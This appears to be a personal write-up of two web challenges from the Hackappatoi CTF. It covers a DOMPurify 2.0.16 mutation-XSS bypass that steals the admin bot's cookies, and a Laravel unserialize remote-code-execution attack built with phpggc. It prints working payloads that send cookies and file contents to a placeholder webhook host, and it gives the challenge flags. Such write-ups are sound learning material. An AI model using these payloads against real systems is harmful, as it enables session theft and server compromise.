

Hackappatoi CTF

During the last weekend i've played the Hackappatoi CTF with my team "Rubi di Cubrik", and i was able to solve a couple of web challenges. So here are the writeups

Drunken Bathrobe

The challenge provides us the full source code. In the file "index.js" we can find all the routes of the web application. A function caught my eyes

```
fastify.post("/report", async (request, reply) => {
  let { query } = request.body;
  console.log("\nREPORT");
  console.log("original query:", query);
  if (query && typeof query == "string" && query != "") {
    query = secureQuery(query);
    console.log("clean query:", query);
    return bot.checkReport(query).then(() => {
      reply.send({
        message: "The admin will check the storage ASAP. Thanks!",
      });
    });
  }
  return reply.send({ message: "Missing parameters.", error: 1 });
});
```

Basically it takes the body of our request, it passes to a function called `secureQuery` which does some sort of sanitization and then calls the function `checkReport` which is defined in the file "bot.js"

```
async function checkReport(query) {
  const browser = await puppeteer.launch(browser_options);
  try {
    const page = await browser.newPage();
    const urlToVisit = "http://127.0.0.1:1337/search?query=" + query;
    console.log("URL to visit:", urlToVisit);

    await page.goto("http://127.0.0.1:1337/");
    await page.setCookie(...cookies);

    await page.goto(urlToVisit, {
      waitUntil: "networkidle0",
      timeout: 10000,
    });

    await browser.close();
  } catch {
    await browser.close();
  }
}
```

This function launches a bot which mimic an admin user, this happens via puppeteer, which is a node library used to control Chrome/Chromium.

In this case, the admin visits the page located at the `search endpoint` with our supplied query

Since the flag is stored inside the cookies of this admin, we need a way to retrieve them. In this case we can try with `XSS`

Let's check the sanitizer function mentioned before, to see if there is a way to bypass it

```
function secureQuery(string) {
  // let's do this real quick, friends are waiting me at the Drunken Bathrobe
  const reg = /math/gi; // nobody likes math
  let res = string.replaceAll(reg, "");
  res = DOMPurify.sanitize(res);
  return res;
}
```

The function uses DOMPurify library to sanitize our query before passing it to the admin. DOMPurify is actually a very strong library, and it performs an excellent sanitization. But a certain version of the library has a known vulnerability. Let's check if that is the version

```
RUN mkdir -p /app
```

```
WORKDIR /app
COPY challenge .
```

```
RUN yarn
```

```
RUN npm i ejs @fastify/view @fastify/formbody @fastify/static dompurify@2.0.16 jsdom
```

In the Dockerfile we can see that the version 2.0.16 is used. This is the vulnerable version of DOMPurify.

For a more detailed explanation about the vulnerability itself you can refer to this link, which explains everything in a wonderful and very easy way

<https://research.securitum.com/dompurify-bypass-using-mxss/>

In a nutshell, that version performs a flawed validation of the payload if certain html tags are used.

The function checks if "math" is in our payload, which is actually one of the possible html tag that can be used to bypass the sanitization

With this in mind we can actually try to retrieve the cookies. We can use the same payload used in the link above, with obviously a little tweak to perform a request back to us

```
query=<svg></p><style><a id=</style><img src=a onerror='var xhr = new  
XMLHttpRequest();xhr.open(`GET`,http://COLLABORATOR_OR_WEBHOOK/?cookie=`+document.cookie  
,false);xhr.send();`>>
```

In the end the payload need to be **url-encoded twice** , otherwise the trick won't work

```
GET /?cookie=flag=hctf{wish this was the flag} HTTP/1.1
```

(yap i forgot once again to make the screenshot during the CTF)

Hackbar

The challenge provides us the full source code, and there are a lot of files. It appears to be a Laravel web application. After looking to most of the files an interesting endpoint caught my attention (under web.php)

After decoding the base64 in the code i've realized that this is a serialized object. So let's check the test endpoint to see if we can exploit the application from there

```
public function test(Request $request)
{
    $cocktail = unserialize(base64_decode($request->get('ser')));
    // return $cocktail;
    return view('cocktail.preview', compact('cocktail'));
}
```

Pretty simple, there is the `unserialize` so it's likely to be vulnerable. We know that is a laravel application so we can use `phpggcc` to try to find a gadget that works for us

After a couple of tries, we can find that laravel/rce4 works fine.

I've used "wget" to see if everything works because when we supply the payload the sever gives us an error 500 but in the background the exploits works fine

```
./phpggcc laravel/rce4 exec 'wget http://COLLABORATOR_OR_WEBHOOK/' | base64
```

So we need to retrieve the flag which is in the root of the web application directory.

```
./phpggcc laravel/rce4 exec 'wget http://COLLABORATOR_OR_WEBHOOK/?flag=$(cat ../flag)' | base64
```

```
GET /?c=hctf{p0p_ch41n1n6_0ur_w4y_1n70_7h3_b4r} HTTP/1.1
Host:
User-Agent: Wget
Connection: close
```